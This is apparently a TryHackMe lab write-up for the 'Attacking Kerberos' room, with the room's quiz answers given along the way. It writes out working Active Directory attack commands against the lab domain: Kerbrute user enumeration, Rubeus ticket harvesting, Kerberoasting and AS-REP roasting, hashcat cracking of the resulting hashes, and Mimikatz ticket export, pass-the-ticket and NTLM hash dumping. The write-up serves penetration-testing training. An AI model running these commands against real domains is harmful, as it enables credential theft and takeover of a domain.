This is the write up for the room Attacking Kerberos on Tryhackme and it is part of the CompTIA Pentest+ Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
Task Attacking Kerberos
Task 1
Start the machine then read all that is in the task. and let’s start Attacking Kerberos
1.1 What does TGT stand for?
A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.
Answer: Ticket Granting Ticket
1.2 What does SPN stand for?
A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.
Answer: Service Principal Name
1.3 What does PAC stand for?
Privilege Attribute Certificate (PAC) – The PAC holds all of the user’s relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.
Answer: Privilege Attribute Certificate
1.4 What two services make up the KDC?
The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.
Answer: AS, TGS
Notice space after the ,
Task 2
As always when dealing with and active directory environment. First we add the machine name to our hosts file
nano /etc/hosts
Installing Kerbrute
Download the file here Releases · ropnop/kerbrute · GitHub
Open a terminal and make the file executable by typing
chmod +x filename
You can rename the file to kerbrute for easy use. Copy the file in your /opt directory by typing in
mkdir /opt/kerbrute cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute
Now you can always find it in your /opt directory.
Now download the user.txt file provided in this task by entering the following command
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt
Let’s start the brute force of user account by typing in the following command
/opt/kerbrute/kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt -t 100
2.1 How many total users do we enumerate?
Answer: 10
2.2 What is the SQL service account name?
Answer: sqlservice
2.3 What is the second “machine” account name?
Answer: machine2
2.4 What is the third “user” account name?
Answer: user3
Task 3
ssh into the machine to complete this task
ssh administrator@<Machine_IP>
cd Downloads
dir
Now we can harvest the tickets by entering the following command
Rubeus.exe harvest /interval:30
3.1 Which domain admin do we get a ticket for when harvesting tickets?
Answer: Administrator
3.2 Which domain controller do we get a ticket for when harvesting tickets?
Computer account always end with $ sign
Answer: CONTROLLER-a$
Task 4
Remember this If the service has a registered SPN then it can be Kerberoastable
We still have the ssh session open. Type in the following
Rubeus.exe kerberoast
We now see the hashes of 2 service account. We can copy this has and crack it with hashcat. This attack means Rubeus.exe needs to be on this machine. With impacket we can do this remotely. But we need a credential to do this
Installing impacket
Install Impacket by entering the following commands
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket pip3 install -r /opt/impacket/requirements.txt cd /opt/impacket/ && python3 ./setup.py install
cd /opt/impacket/examples
Now enter the command ( change ip)
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.142.212 -requestWe now also see the 2 service account with their hashes
Now save both hashes but in different files
Now download the password list provided in the task by entering the command
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt
4.1 What is the HTTPService Password?
Now we have the hashes we can crack it
hashcat -m 13100 -a 0 httphash.txt Pass.txt
You can find the password in the blue area
4.2 What is the SQLService Password?
hashcat -m 13100 -a 0 sqlhash.txt Pass.txt
You can find the password in the blue area
Task 5
Shh back into the deployed machine
ssh administrator@MACHINE_IP
Task 3 has got the credentials
Once connected enter the following commands
cd Downloads Rubeus.exe asreproast
This will spit out 2 hashes
Copy those hashes into a file on you linux machine name the file after the found username followed by .txt
Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User…..
Make sure there are no spaces when saving it to a txt file
5.1 What hash type does AS-REP Roasting use?
To find this one you need to get the hascat command we are using. It has the -m 18200. Meaning it is using hash mode 18200 . We can find all hash modes in the hascat wiki page or use the man hashcat command
Answer: Kerberos 5 AS-REP etype 23
5.2 Which User is vulnerable to AS-REP Roasting?
Answer: user 3
5.3 What is the User’s Password?
Type in the following command
hashcat -m 18200 user3.txt Pass.txt
5.4 What is the Admin’s Password?
Type in the following command
hashcat -m 18200 Admin2.txt Pass.txt
Task 6
Follow allong with the guide in this task
To recap
Login with ssh to the machine deployed and run the following commands
cd Downloads mimikatz.exe privilege::debug sekurlsa::tickets /export To use the has and login we can use kerberos::ptt <ticket>
Task 7
Read all that is in the task and try to follow along
7.1 What is the SQLService NTLM Hash?
While still connecte with ssh type in the following command
lsadump::lsa /inject /name:sqlservice
7.2 What is the Administrator NTLM Hash?
While still connecte with ssh type in the following command
lsadump::lsa /inject /name:Administrator
Task 8
Read all that is in the task and press complete
Task 9
Read all that is in the task and press complete
